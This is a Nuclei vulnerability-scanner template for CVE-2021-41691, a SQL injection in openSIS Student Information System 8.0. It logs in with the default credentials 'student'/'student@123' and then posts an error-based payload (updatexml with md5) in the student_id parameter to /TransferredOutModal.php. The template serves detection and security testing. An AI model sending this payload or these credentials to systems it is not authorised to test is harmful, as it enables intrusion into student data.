id: CVE-2021-41691

info:
  name: openSIS Student Information System 8.0 SQL Injection
  author: Bartu Utku SARP
  severity: high
  description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
  reference:
    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
    - https://www.exploit-db.com/exploits/50637
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
  classification:
    cve-id: CVE-2021-41691
  tags: cve,cve2021,opensis,sqli,auth

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

    attack: pitchfork
    payloads:
      username:
        - student

      password:
        - student@123

    req-condition: true
    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
          - 'status_code_2 == 200'
        condition: and

# Enhanced by mp on 2022/03/28